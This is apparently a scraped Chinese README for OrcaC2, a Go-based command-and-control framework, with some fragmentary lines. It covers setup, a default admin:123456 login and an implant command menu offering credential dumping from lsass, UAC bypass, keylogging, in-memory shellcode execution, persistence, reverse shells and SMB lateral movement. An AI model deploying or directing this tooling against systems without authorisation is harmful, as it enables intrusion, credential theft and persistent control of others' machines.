OrcaC2是一款基于Websocket加密通信的多功能C&C框架,使用Golang实现。
OrcaC2
是一款基于Websocket加密通信的多功能C&C框架,使用Golang实现。
由三部分组成:Orca_Server
(服务端)、Orca_Master
(控制端)、Orca_Puppet
(被控端)。
🐳
ps
命令时显示进程名为进程列表中任意进程,并能够删除自身程序)(被控端为linux系统)编译源码前,需要先在本地安装:go (>=1.18) 、gcc
下载并解压源码包后,直接运行install.bat
文件即可。
$ git clone https://github.com/Ptkatz/OrcaC2.git
$ cd OrcaC2
$ chmod +x install.sh
$ ./install.sh
若
install.sh
执行出错需将脚本中的命令一条条单独执行
存在配置文件(./conf/app.ini
)与数据库文件(./db/team.db
、./qqwry.dat
)的情况下双击即可运行
参数说明:
Orca_Puppet.exe -host <Server端IP:端口> -debug -hide
参数说明:
Puppet端可在Master端上使用
generate/build
命令生成
Orca_Master.exe -u <用户名> -p <密码> -H <Server端IP:端口>
参数说明:
Server端数据库中默认的用户名和密码为 admin:123456
连接成功:
C:\Users\blood\Desktop\OrcaC2\out\master>Orca_Master_win_x64.exe -u admin -p 123456
OrcaC2 Master 0.10.9
https://github.com/Ptkatz/OrcaC2
,;;;;;;,
{;g##7 9####h;;;;,,
{E777777779###########F7'
~` 7##########;
<:_ "##########h
-(:__ VG#3######,
~-=:=:=:__ -""d#####]
~--====_ {Q####]
{;;, ~-<=: l#####
9###. ~==: {Q###F'
g###h, =::` {a####7
;;;########gss;g####P7
7777777777G###7777'
;g77h; lE779; {;P79] g#,
l# #] lE;;gF #] gLJ#,
7N;;F7 l# "9h "7L;g] gF777#,
by: Ptkatz
2022/11/04 19:29:53 [*] login success
Orca[admin] » help
OrcaC2 command line tool
Commands:
clear clear the screen
exit exit the shell
generate, build generate puppet
help use 'help [command]' for command help
list, ls list hosts
port use port scan or port brute
powershell manage powershell script
proxy activate the proxy function
select select the host id waiting to be operated
ssh connects to target host over the SSH protocol
Orca[admin] » list
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| ID | HOSTNAME | IP | OS | ARCH | PRIVILEGE | PORT |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| 1 | PTKATZ/ptkatz | 10.10.10.10 | Microsoft Windows Server 2016 Datacenter | amd64 | user | 49704 |
| 2 | kali/root | 192.168.123.243 | Kali GNU/Linux Rolling | amd64 | root | 35872 |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
Orca[admin] » select 1
Orca[admin] → 10.10.10.10 » help
OrcaC2 command line tool
OrcaC2 command line tool
Commands:
assembly manage the CLR and execute .NET assemblies
back back to the main menu
clear clear the screen
close close the selected remote client
dump extract the lsass.dmp
exec execute shellcode or pe in memory
exit exit the shell
file execute file upload or download
generate, build generate puppet
getadmin bypass uac to get system administrator privileges
help use 'help [command]' for command help
info get basic information of remote host
keylogger get information entered by the remote host through the keyboard
list, ls list hosts
persist permission maintenance
plugin load plugin (mimikatz|fscan)
port use port scan or port brute
powershell manage powershell script
process, ps manage remote host processes
proxy activate the proxy function
reverse reverse shell
screen screenshot and screensteam
select select the host id waiting to be operated
shell, sh send command to remote host
smb lateral movement through the ipc$ pipe
ssh connects to target host over the SSH protocol
Orca[admin] → 10.10.10.10 »
https://github.com/woodylan/go-websocket
https://github.com/BishopFox/sliver
https://github.com/Ne0nd0g/merlin
https://github.com/Ne0nd0g/go-clr
https://github.com/Binject/go-donut
https://github.com/sh4hin/GoPurple
https://github.com/whitehatnote/BlueShell
https://github.com/0x9ef/golang-uacbypasser
https://github.com/Amzza0x00/go-impacket
https://github.com/C-Sto/goWMIExec
https://github.com/4dogs-cn/TXPortMap
https://github.com/niudaii/crack
https://github.com/anthemtotheego/C_Shot
https://github.com/ramoncjs3/DumpLsass
https://github.com/EgeBalci/EGESPLOIT
由衷感谢以上项目的作者/团队对开源的贡献与支持
assembly invoke
功能调用部分C#程序时会出错,在工作中务必先进行试验smb exec
)上线时,无法使用屏幕截图与屏幕控制功能-hide
)时,调用pty
功能时可能会使程序崩溃!pty
功能时可能会使程序崩溃!本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,本人将不承担任何法律及连带责任。
在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。